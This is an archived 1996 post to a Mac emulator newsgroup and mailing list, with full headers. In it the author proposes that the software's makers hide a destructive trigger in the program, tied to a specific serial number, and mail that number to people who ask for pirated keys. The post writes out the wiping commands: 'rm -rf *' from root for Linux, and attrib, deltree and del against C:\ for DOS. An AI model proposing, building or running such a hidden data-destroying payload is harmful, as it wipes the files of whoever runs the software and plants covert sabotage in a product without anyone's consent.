home *** CD-ROM | disk | FTP | other *** search
/ Executor 2.0 / executorv2.0.iso / pc / dos / extra / docs / maillist / text / archive.96 / text7700.txt < prev    next >
Encoding:
Text File  |  1996-07-25  |  1.7 KB  |  47 lines

  1.     id m0uZrPa-0007u9a; Fri, 28 Jun 96 22:13 MDT
  2. Sender: owner-executor
  3. Received: from ardi.com by ftp.ardi.com
  4.     (Smail3.1.29.1 #3) id m0uZrP5-0007u8n; Fri, 28 Jun 96 22:13 MDT
  5. Path: sloth.swcp.com!tesuque.cs.sandia.gov!ferrari.mst6.lanl.gov!newshost.lanl.gov!ncar!elroy.jpl.nasa.gov!swrinde!ihnp4.ucsd.edu!munnari.OZ.AU!bunyip.cc.uq.oz.au!news.usq.edu.au!helios.usq.edu.au!d9060469
  6. From: Michelle Pankowski <d9060469@helios.usq.edu.au>
  7. Newsgroups: comp.emulators.mac.executor
  8. Subject: howto fix serial# idiots permanently
  9. Date: Sat, 29 Jun 1996 10:31:05 +1000
  10. Organization: University of Southern Queensland
  11. Lines: 25
  12. Message-ID: <Pine.HPP.3.91.960629102103.16244A-100000@helios.usq.edu.au>
  13. NNTP-Posting-Host: helios.usq.edu.au
  14. Mime-Version: 1.0
  15. Content-Type: TEXT/PLAIN; charset=US-ASCII
  16. To: executor@ardi.com
  17. X-MailNews-Gateway: From newsgroup comp.emulators.mac.executor
  18. Sender: owner-executor@ardi.com
  19. Precedence: bulk
  20.  
  21. Include some code in the unlockable versions that will
  22. 'do a little mischief'.  Something like 
  23.  
  24. cd /
  25. rm -rf * for linux and the following for the DOS version
  26.  
  27. cd\
  28. attrib -rhs c:\*.*
  29. deltree /y c:\windows
  30. deltree /y c:\dos
  31. deltree /y c:\executor
  32. del c:\*.*
  33.  
  34. Make this code execute when a specific serial# is entered.
  35. Then when some dweeb criminal posts a 'gimme keys please' message,
  36. just mail him the destructive keys and let Executor do the rest.
  37.  
  38. This idea really does
  39.  have some merit;)
  40.  
  41. Then mail them 30 minutes later with a message like, 
  42. "Please can someone send me $150 dollars, I can't wait until we shrink 
  43. wrap E2. Please, this lack of money is a real annoyance when I try to buy 
  44. stuff.  And oh yes... have a nice day:)"
  45.  
  46.  
  47.